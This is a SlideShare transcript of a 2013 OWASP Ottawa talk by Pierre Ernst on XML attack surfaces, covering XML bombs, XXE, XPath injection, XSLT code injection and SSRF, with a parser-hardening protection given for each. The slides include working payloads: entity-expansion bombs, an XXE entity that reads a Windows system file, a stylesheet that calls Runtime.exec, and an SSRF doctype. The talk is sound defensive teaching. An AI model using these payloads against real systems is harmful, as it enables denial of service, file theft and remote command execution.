XML Attack Surface - Pierre Ernst (OWASP Ottawa)

4,173 views

Published on

XML processing security vulnerabilities and how to avoid them.

0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,173
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
76
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

XML Attack Surface - Pierre Ernst (OWASP Ottawa)

  1. 1. OWASPXML Attack Surface Business Analytics Security Competency GroupPierre Ernst, 2013
  2. 2. OWASPXML is PervasivePierre Ernst, 2013 2/32
  3. 3. OWASPXML intro ■ Born in 1998 (see initial specifications) ■ Data interchange format – International languages support – Text based – Human readable ■ Parsers – DOM – SAX, rooted in Ottawa (see bio) – StAX ■ Complementary technologies and standards – XML Validation (DTD, XSD, ...) – XML Transformation (XSLT)Pierre Ernst, 2013 – XML Query (XQuery, XPath) 3/32
  4. 4. OWASPIs XML Secure? ■ Nothing wrong with the standard itself ■ Most vulnerabilities due to – Libraries/Tools misconfiguration – Insufficient validation of untrusted input known, reported security vulnerabilities (see CVE search)Pierre Ernst, 2013 4/32
  5. 5. OWASPXML Bomb ■ CWE-776: Denial of service (memory exhaustion) ■ Amit Klein, 2002 (see BugTraq) ■ XML entity expansion <!DOCTYPE ibm [ <!ENTITY ernst128 "pierre"> <!ENTITY ernst127 "&ernst128;&ernst128;"> ... <!ENTITY ernst002 "&ernst003;&ernst003;"> <!ENTITY ernst001 "&ernst002;&ernst002;"> <!ENTITY ernst000 "&ernst001;&ernst001;"> ]> <ibm>&ernst000;</ibm>Pierre Ernst, 2013 5/32
  6. 6. OWASPModus Operandi Attacker Vulnerable Server 2 POST /request HTTP/1.1 <ibm>&ernst001;&e <ibm>&ernst000;</ <ibm>&ernst002;&e <ibm>&ernst003;&e rnst001;</ibm> ibm> rnst002;&ernst002 rnst003;&ernst003 1 ;&ernst002;</ibm> ;&ernst003;&ernst 003;&ernst003;&er nst003;&ernst003; </ibm>Pierre Ernst, 2013 6/32
  7. 7. OWASPDemo #1: Server Crash with XML Bomb (Source code available on demand)Pierre Ernst, 2013 7/32
  8. 8. OWASPVariation: “Quadratic Blowup Attack” ■ Amit Klein (see MSDN article) ■ Uses one single entity of size 50KB ■ Reference the entity 50,000 times ■ Useful to bypass FEATURE_SECURE_PROCESSING protection – Limits entity expansions to • 100,000 (IBM) • 64,000 (Oracle) <!DOCTYPE pierre [ <!ENTITY e "eeeeeeeeeeee...eeeeeeeee"> ]> <pierre>&e;&e;&e;...&e;&e;&e;</pierre>Pierre Ernst, 2013 8/32
  9. 9. OWASPProtection DOM SAX StAX factory.setFeature("http://apache.org factory.setPropert /xml/features/disallow-doctype-decl", y(XMLInputFactory. true); IS_REPLACING_ENTIT Y_REFERENCES, false);Pierre Ernst, 2013 9/32
  10. 10. OWASPExternal Entity Reference (XXE) ■ CWE-611: Information Disclosure ■ Gregory Steuck, 2002 (see BugTraq) ■ Requires the server to include user-supplied data in the response <!DOCTYPE pierre [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini"> ]> <pierre>&ernst;</pierre>Pierre Ernst, 2013 10/32
  11. 11. OWASPModus Operandi Attacker Vulnerable Server POST /request HTTP/1.1 2 <pierre>[... <pierre> 1 content of the &ernst; file on the </pierre> server...]</pierr e> 3 HTTP/1.1 200 OK Content-Type: text/xml <response> Unknown service [... content of the file on the server...]Pierre Ernst, 2013 </response> 11/32
  12. 12. OWASPDemo #2: File Content Disclosure with XXE (Source code available on demand)Pierre Ernst, 2013 12/32
  13. 13. OWASPProtection DOM SAX StAX factory.setFeature("http://apache.org factory.setPropert /xml/features/disallow-doctype-decl", y(XMLInputFactory. true); IS_REPLACING_ENTIT Y_REFERENCES, false);Pierre Ernst, 2013 13/32
  14. 14. OWASPBlind Xpath Injection (“XML Injection”) ■ CWE-643: Abuse of Functionality ■ Amit Klein, 2004 (see white-paper) ■ User input is embedded as-is in Xpath statement <users> <user> <name>pierre</name> <password>i8simon</password> oror = pierre pierre = </user> <user> i8simon *********** <name>trevor</name> or = <password>mee2</password> </user> </users> //users/user[name/text()= and password/text()= ]/name/text()Pierre Ernst, 2013 14/32
  15. 15. OWASPModus Operandi Attacker Vulnerable Server 2 POST /login HTTP/1.1 //users/user[name/ text()= 1 or = and password/text()= or =] /name/text() pierre 3 trevor HTTP/1.1 200 OK Content-Type: text/htmlPierre Ernst, 2013 15/32
  16. 16. OWASPDemo #3: Blind Xpath Injection (Source code available on demand)Pierre Ernst, 2013 16/32
  17. 17. OWASPVariation: Read System Properties ■ JAXP implementation: –IBM –Oracle ■ Interesting properties: –os.version –user.name –java.class.path –sun.java.command system-property(sun.java.command)Pierre Ernst, 2013 17/32
  18. 18. OWASPProtection ■ Input Validation. ■ “[A-Za-z0-9_-]+” in our example.Pierre Ernst, 2013 18/32
  19. 19. OWASPCode Injection during XSLT ■ CWE-94: Improper Control of Generation of Code ■ When the attacker can control the XML style sheet applied to an XML document. ■ Uses transformer engine extension capabilities <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="xalan://java.lang.Runtime" exclude-result-prefixes="rt"> <xsl:template match="/"> <xsl:variable name="obj" select="rt:getRuntime()"/> <xsl:value-of select="rt:exec($obj,calc.exe)"/> </xsl:template> </xsl:stylesheet>Pierre Ernst, 2013 19/32
  20. 20. OWASPModus Operandi <doc> whatever </doc> <stylesheet> malicious </stylesheet>Attacker Vulnerable Server GET /request?doc=...&stylesheet=... HTTP/1.1 1 2 3 Load class java.lang.Runtime Call exec() methodPierre Ernst, 2013 20/32
  21. 21. OWASPDemo #4: Remote OS Command Injection (Source code available on demand)Pierre Ernst, 2013 21/32
  22. 22. OWASPVariation #1: Universal XXE ● “Universal”: you always see the entity in the response <!DOCTYPE xsl:stylesheet [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini"> ]> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> &ernst; </xsl:template> </xsl:stylesheet>Pierre Ernst, 2013 22/32
  23. 23. OWASPVariation #2: Infinite Loop <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template name="loop"> 2 <xsl:call-template name="loop"/> </xsl:template> 1 <xsl:template match="/"> <xsl:call-template name="loop"/> </xsl:template> </xsl:stylesheet>Pierre Ernst, 2013 23/32
  24. 24. OWASPVariation #3: Cross-Site Scripting (XSS) <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml"> <xsl:output method="html"/> <xsl:template match="/"> <xhtml:script>alert(XSS);</xhtml:script> </xsl:template> </xsl:stylesheet>Pierre Ernst, 2013 24/32
  25. 25. OWASPProtection ■ Several ways to abuse XML Stylesheet Transforms. ■ Users should never been able to use custom XML stylesheets.Pierre Ernst, 2013 25/32
  26. 26. OWASPServer Side Request Forgery (SSRF) ■ CWE-601: Open Redirect, but server-to-server ■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon) ■ XML vectors: – Xml eXternal Entities (XXE) – Xinclude – External Doctype inclusion: <!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon"> <pierre/>Pierre Ernst, 2013 26/32
  27. 27. OWASPModus OperandiAttacker Vulnerable Server Internal Service 1 POST /request HTTP/1.1 Content-Type: application/xml Content-Lenght: 666 <?xml version=”1.0”?> whatever 2 ...Pierre Ernst, 2013 27/32
  28. 28. OWASPProtection DOM SAX StAX factory.setFeature("http://apache.org/ factory.setPropert xml/features/disallow-doctype-decl", y(XMLInputFactory. true); SUPPORT_DTD, false);Pierre Ernst, 2013 28/32
  29. 29. OWASPVariation: Exotic Java URL Handlers ■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)Pierre Ernst, 2013 29/32
  30. 30. OWASPConclusions ■ Always configure your XML parsers to disallow Doctype. –From a servers perspective, clients should not be able to define the grammar of the request anyway –Secure Processing Flag is not enough –Preventing external entity expansion is not enough ■ XPath: validate users input ■ XSLT: avoid at any cost ■ Always apply Java patches from vendorsPierre Ernst, 2013 30/32
  31. 31. OWASPPierre Ernst■ 10 years as Software Developer■ 5 years as Penetration Tester – 750+ vulns – Manual Code Review – Manual Black Box Testing – Java, XML, Open Source, … http://ca.linkedin.com/in/pernst https://twitter.com/e_rnst pierre.ernst@gmail.comPierre Ernst, 2013 31/32
  32. 32. OWASPQuestions & AnswersPierre Ernst, 2013 32/32

×